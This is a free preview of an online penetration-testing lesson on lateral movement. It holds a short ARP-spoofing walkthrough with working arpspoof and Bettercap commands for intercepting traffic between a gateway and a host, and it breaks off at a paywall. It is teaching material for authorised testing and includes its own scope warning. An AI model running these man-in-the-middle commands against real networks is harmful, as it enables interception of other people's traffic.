You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Once you have compromised a single host, lateral movement is the process of pivoting through the network to reach higher-value targets — domain controllers, databases, file servers, and other critical infrastructure. This lesson covers network-level attacks, Active Directory exploitation, and pivoting techniques.
Scope warning: Lateral movement can quickly take you beyond your authorised scope. Always verify that each target is within the rules of engagement before proceeding.
ARP spoofing allows an attacker to intercept traffic between two hosts on the same network segment:
Normal Communication:
Host A ──────── Switch ──────── Host B
ARP Spoofed (Man-in-the-Middle):
Host A ──────── Attacker ──────── Host B
(intercepting traffic)
# Using arpspoof (part of dsniff)
# Enable IP forwarding first
echo 1 > /proc/sys/net/ipv4/ip_forward
# Spoof — tell the gateway you are the target
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.100
# Using Bettercap (more modern)
bettercap -iface eth0
> net.probe on
> set arp.spoof.targets 192.168.1.100
> arp.spoof on
> net.sniff on
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.